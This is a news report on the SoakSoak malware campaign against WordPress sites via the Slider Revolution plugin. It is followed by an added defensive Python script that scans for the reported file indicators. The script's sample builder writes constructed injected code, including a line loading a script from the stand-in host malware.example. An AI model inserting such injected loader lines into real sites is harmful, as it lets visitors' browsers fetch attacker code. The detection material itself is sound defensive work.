A piece of Russian malware dubbed SoakSoak has infected nearly 100,000 WordPress websites since Sunday, prompting Google to blacklist more than 11,000 of those domains (a number that is still rising), according to a report from the cybersecurity firm Sucuri.
The malware exploits a previously known vulnerability in a WordPress plugin called Slider Revolution to modify the file wp-includes/template-loader.php, causing wp-includes/js/swobject.js to be loaded on every page of the site, which in turn loads the malware from a Russian website.
The campaign is targeting WordPress users running Internet Explorer on Windows. It also makes use of a number of new backdoor payloads: some are injected into images to help evade detection, while others are used to inject new administrator users into vulnerable WordPress installs.
Replacing the files mentioned above is not a permanent solution, because it does not address the leftover backdoors or the initial entry point, the report notes. The only way to remove the infection is to make sure that the Slider Revolution plugin you are using is up to date, although Sucuri says that won't be easy.
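As an added example (not code from the article or from Sucuri), the script below checks a WordPress install for the two file indicators the report names: a template-loader.php that references swobject.js, and a swobject.js that pulls content from a remote URL. The injected strings, the sample files and the placeholder domain malware.example are constructed for illustration only.

```python
"""Heuristic check for the SoakSoak file indicators named in the report (added example)."""
import os
import re
import tempfile

# Files the report says the campaign modifies (paths as given on the page).
LOADER = os.path.join("wp-includes", "template-loader.php")
SCRIPT = os.path.join("wp-includes", "js", "swobject.js")
# A quoted absolute URL inside the script file is suspicious: a core helper script
# has no reason to pull code from a third-party host. Requiring quotes keeps the
# URLs found in licence/header comments from producing a finding.
QUOTED_URL = re.compile(r"""["']https?://[^"']+["']""")

def _read(path):
    """Return a file's text, or None when the file does not exist."""
    if not os.path.isfile(path):
        return None
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()

def scan_wordpress_root(root):
    """Return a list of findings for the WordPress install rooted at `root`."""
    findings = []
    loader = _read(os.path.join(root, LOADER))
    # A clean loader never references this script; the report says the
    # infection adds exactly such a reference so the script runs on every page.
    if loader is not None and "swobject" in loader.lower():
        findings.append(f"{LOADER}: references swobject.js (injected loader)")
    script = _read(os.path.join(root, SCRIPT))
    for url in QUOTED_URL.findall(script or ""):
        findings.append(f"{SCRIPT}: references remote URL {url}")
    return findings

def build_sample_site(infected):
    """Write constructed sample files to a throw-away directory; return its path."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-includes", "js"))
    loader = "<?php\n// constructed stand-in for the core loader\ndo_action('template_redirect');\n"
    script = "/* constructed stand-in; header URL http://example.invalid/ is unquoted */\n"
    if infected:  # constructed indicators, not the campaign's actual payload
        loader += "add_action('wp_enqueue_scripts', function () { wp_enqueue_script('swobject'); });\n"
        script += "document.write('<script src=\"http://malware.example/x.js\"></script>');\n"
    with open(os.path.join(root, LOADER), "w") as fh:
        fh.write(loader)
    with open(os.path.join(root, SCRIPT), "w") as fh:
        fh.write(script)
    return root
```

A heuristic like this only confirms the indicators the report describes; comparing both files against a pristine copy of the same WordPress release, and verifying the Slider Revolution plugin version, catches what it misses.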
“The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owners,” the report said, adding that some site owners don’t even know they have the plugin, because it was bundled into their theme.
If you want to check whether your website is infected, you can use Sucuri's free site scanner.